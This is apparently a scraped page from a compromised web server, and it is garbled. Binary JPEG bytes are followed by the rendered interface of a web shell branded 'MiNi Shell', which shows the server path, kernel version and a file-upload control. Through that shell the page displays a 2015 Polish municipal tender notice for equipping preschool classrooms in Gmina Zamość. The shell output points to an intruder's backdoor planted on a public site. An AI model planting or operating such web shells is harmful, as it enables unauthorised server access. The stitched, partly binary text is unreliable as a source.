JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150521/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150521/120770-N-2015.html

<p class="kh_header"><b>Zamość: Modernizacja oddziałów przedszkolnych w szkołach podstawowych w Gminie Zamość</b><br>
<b>Numer ogłoszenia: 120770 - 2015; data zamieszczenia: 21.05.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Ekonomiczno-Administracyjny Szkół Gminy Zamość , Kalinowice 148, 22-400 Zamość, woj. lubelskie, tel. 084 616 72 74, faks 084 616 72 53.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ugzamosc.bip.lubelskie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizacja oddziałów przedszkolnych w szkołach podstawowych w Gminie Zamość.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiot zamówienia obejmuje:
Dostawę i montaż: 
- mebli (szafek, regałów itp.) do pomieszczeń oddziałów  przedszkolnych
- wyposażenia, zabawek, pomocy dydaktycznych  do sal oddziałów przedszkolnych, artykułów  plastycznych 
- sprzętu AGD
w ramach projektu pn. Modernizacja oddziałów przedszkolnych w szkołach podstawowych w Gminie Zamość, realizowanego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX. Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1 Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.1 Zmniejszenie nierówności w stopniu upowszechniania edukacji przedszkolnej, współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego.

2. Zamówienie podzielone jest na następujące części:

Część I Zakup, dostawa i montaż  mebli ( szafek, regałów, itp.) do pomieszczeń oddziałów  przedszkolnych do Zespół Szkół w Sitańcu, Szkoła Podstawowa w Mokrem, Szkoła Podstawowa w Borowinie Sitanieckiej, Szkoła Podstawowa w Wólce Wieprzeckiej, Zespół Szkół w Wysokiem, Zespół szkół w Żdanowie, Zespół Szkół w Płoskiem, Szkoła Podstawowa w Zawadzie.


Część  II.  Zakup, dostawa i montaż  wyposażenia ( pomoce dydaktyczne, tablice, apteczka, artykuły plastyczne ) zabawek, pomocy dydaktycznych  do sal oddziałów przedszkolnych do  Zespół Szkół w Sitańcu, Szkoła Podstawowa w Mokrem, Szkoła Podstawowa w Borowinie Sitanieckiej, Szkoła Podstawowa w Wólce Wieprzeckiej, Zespół Szkół w Wysokiem, Zespół szkół w Żdanowie, Zespół Szkół w Płoskiem, Szkoła Podstawowa w Zawadzie.


Część  III.  Zakup, dostawa i montaż wyposażenia  sprzętu AGD (pralki , lodówka, froterki, młynek do rozdrabniania resztek itp. ) do  Zespół Szkół w Sitańcu, Szkoła Podstawowa w Mokrem, Szkoła Podstawowa w Borowinie Sitanieckiej, Szkoła Podstawowa w Wólce Wieprzeckiej, Zespół Szkół w Wysokiem, Zespół szkół w Żdanowie, Zespół Szkół w Płoskiem, Szkoła Podstawowa w Zawadzie.


3. Szczegółowe  zakresy  zakupów i dostaw zawarte są  w załącznikach do SIWZ.
Część I    - Załącznik nr 1 (meble)
Część  II  - Załącznik nr 2 (pomoce dydaktyczne)
Część III - Załącznik nr 3 (AGD)


4. Wykonawca zobowiązuje się dostarczyć Zamawiającemu rzeczy fabrycznie nowe, wolne od wad, oryginalnie zapakowane i odpowiadające normom jakościowym określonym we właściwych aktach prawnych.

5. Podane w specyfikacji nazwy własne mają za zadanie sprecyzowanie oczekiwań jakościowych Zamawiającego. Zamawiający dopuszcza składanie ofert równoważnych pod warunkiem, że zagwarantują one uzyskanie parametrów technicznych, eksploatacyjnych i jakościowych nie gorszych niż określone przez Zamawiającego oraz gwarantują taką samą funkcjonalność  jak rzeczy opisanych w zał. nr 1,2,3,

6. Ciężar udowodnienia, że zaoferowany przedmiot jest równoważny w stosunku do wymaganego przez Zamawiającego spoczywa na Oferencie.

7. Oferent jest odpowiedzialny za wykonanie całego przedmiotu zamówienia w tym za terminowe wykonanie, jakość i zgodność z warunkami technicznymi i jakościowymi.

8. Oferent na swój koszt dostarczy, rozładuje oraz zamontuje sprzęty i meble w miejscach
wskazanych przez Zamawiającego oraz dokona ich wstępnego rozruchu.

9. Oferent na swój koszt przeszkoli personel w zakresie obsługi tablic interaktywnych, sprzętu
multimedialnego oraz innych dostarczonych sprzętów.

10. Miejscem realizacji zadania jest 12 oddziałów przedszkolnych w 8 szkołach na terenie Gminy Zamość:  Zespół Szkół w Sitańcu Sitaniec 422 22-400 Zamość , Szkoła Podstawowa w Mokrem Mokre 303 22-400 Zamość, Szkoła Podstawowa w Borowinie Sitanieckiej Borowina Sitaniecka 49 22-400 Zamość, Szkoła Podstawowa w Wólce Wieprzeckiej Wólka Wieprzecka 10 22-470 Zwierzyniec, Zespół Szkół w Wysokiem Wysokie 133 22-400 Zamość, Zespół szkół w Żdanowie Żdanów 124 22-400 Zamość, Zespół Szkół w Płoskiem Płoskie 139 22-400 Zamość, Szkoła Podstawowa w Zawadzie Zawada 46 22-400 Zamość .


11. W przypadku sprzętu AGD  podane parametry są parametrami minimalnymi.

12. Każdy z dostarczonych przedmiotów powinien posiadać deklarację zgodności CE oraz
odpowiadać  normom europejskim i krajowym, w szczególności być zgodny z Dyrektywą
2001/95/WE Parlamentu Europejskiego z dnia 3 grudnia 2001 r. w sprawie ogólnego
bezpieczeństwa produktów. Wyposażenie sal winno posiadać atesty, certyfikaty wymagane dla wyrobów przeznaczonych dla dzieci.

13. Wybrany Wykonawca wraz przedmiotem zamówienia przekaże Dyrektorom szkół  komplet dokumentów (protokoły inwentaryzacje, opinie, uzgodnienia, certyfikaty, gwarancje)
potwierdzających spełnianie wymagań i prawidłowości ich zamontowania.

14. W przypadku stwierdzenia, że dostarczone przedmioty są uszkodzone, bądź nie odpowiadają przedmiotowi zamówienia pod względem jakości, funkcjonalności i parametrów technicznych, Wykonawca wymieni je na inne właściwe na własny koszt..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 39.22.00.00-0, 39.16.21.00-6, 37.52.00.00-9, 39.16.10.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zał. Nr 5 i 6 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zał. Nr 5 i 6 do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zał. Nr 5 i 6 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zał. Nr 5 i 6 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zał. Nr 5 i 6 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Formularz ofertowy ( załącznik nr 4 do SIWZ)
2.	Uzupełnione  załączniki Nr 1, 2, 3, - odpowiednio do danej części.  ( załączniki nr 1,2,3 do SIWZ ) 
3.	Oświadczenie ( załącznik nr 5 do SIWZ)
4.	Oświadczenie  ( załącznik nr 6 do SIWZ)
5.	Oświadczenie  ( załącznik nr 7 do SIWZ)
6.	Zaparafowany projekt umowy ( załącznik nr 8 do SIWZ)</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>


<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ugzamosc.bip.lubelskie.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Ekonomiczno-Administracyjny Szkół Gminy Zamość, Kalinowice 148, 22-400 Zamość, pokój nr 2.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.06.2015 godzina 10:00, miejsce: Zespół Ekonomiczno-Administracyjny Szkół Gminy Zamość, Kalinowice 148, 22-400 Zamość, pokój nr 2.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> w ramach projektu pn. Modernizacja oddziałów przedszkolnych w szkołach podstawowych w Gminie Zamość, realizowanego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX. Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1 Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.1 Zmniejszenie nierówności w stopniu upowszechniania edukacji przedszkolnej, współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część I Zakup, dostawa i montaż  mebli ( szafek, regałów, itp.) do pomieszczeń oddziałów  przedszkolnych do Zespół Szkół w Sitańcu, Szkoła Podstawowa w Mokrem, Szkoła Podstawowa w Borowinie Sitanieckiej, Szkoła Podstawowa w Wólce Wieprzeckiej, Zespół Szkół w Wysokiem, Zespół szkół w Żdanowie, Zespół Szkół w Płoskiem, Szkoła Podstawowa w Zawadzie..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakup, dostawa i montaż  mebli ( szafek, regałów, itp.) do pomieszczeń oddziałów  przedszkolnych do Zespół Szkół w Sitańcu, Szkoła Podstawowa w Mokrem, Szkoła Podstawowa w Borowinie Sitanieckiej, Szkoła Podstawowa w Wólce Wieprzeckiej, Zespół Szkół w Wysokiem, Zespół szkół w Żdanowie, Zespół Szkół w Płoskiem, Szkoła Podstawowa w Zawadzie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.22.00.00-0, 39.16.21.00-6, 37.52.00.00-9, 39.16.10.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. liczba miesięcy  udzielonej gwarancji - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część  II.  Zakup, dostawa i montaż  wyposażenia ( pomoce dydaktyczne, tablice, apteczka, artykuły plastyczne ) zabawek, pomocy dydaktycznych  do sal oddziałów przedszkolnych do  Zespół Szkół w Sitańcu, Szkoła Podstawowa w Mokrem, Szkoła Podstawowa w Borowinie Sitanieckiej, Szkoła Podstawowa w Wólce Wieprzeckiej, Zespół Szkół w Wysokiem, Zespół szkół w Żdanowie, Zespół Szkół w Płoskiem, Szkoła Podstawowa w Zawadzi.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakup, dostawa i montaż  wyposażenia ( pomoce dydaktyczne, tablice, apteczka, artykuły plastyczne ) zabawek, pomocy dydaktycznych  do sal oddziałów przedszkolnych do  Zespół Szkół w Sitańcu, Szkoła Podstawowa w Mokrem, Szkoła Podstawowa w Borowinie Sitanieckiej, Szkoła Podstawowa w Wólce Wieprzeckiej, Zespół Szkół w Wysokiem, Zespół szkół w Żdanowie, Zespół Szkół w Płoskiem, Szkoła Podstawowa w Zawadzie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.22.00.00-0, 39.16.21.00-6, 37.52.00.00-9, 39.16.10.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. liczba miesięcy  udzielonej gwarancji - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Część  III.  Zakup, dostawa i montaż wyposażenia  sprzętu AGD (pralki , lodówka, froterki, młynek do rozdrabniania resztek itp. ) do  Zespół Szkół w Sitańcu, Szkoła Podstawowa w Mokrem, Szkoła Podstawowa w Borowinie Sitanieckiej, Szkoła Podstawowa w Wólce Wieprzeckiej, Zespół Szkół w Wysokiem, Zespół szkół w Żdanowie, Zespół Szkół w Płoskiem, Szkoła Podstawowa w Zawadzie..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakup, dostawa i montaż wyposażenia  sprzętu AGD (pralki , lodówka, froterki, młynek do rozdrabniania resztek itp. ) do  Zespół Szkół w Sitańcu, Szkoła Podstawowa w Mokrem, Szkoła Podstawowa w Borowinie Sitanieckiej, Szkoła Podstawowa w Wólce Wieprzeckiej, Zespół Szkół w Wysokiem, Zespół szkół w Żdanowie, Zespół Szkół w Płoskiem, Szkoła Podstawowa w Zawadzie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.22.00.00-0, 39.16.21.00-6, 37.52.00.00-9, 39.16.10.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. liczba miesięcy  udzielonej gwarancji - 20</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com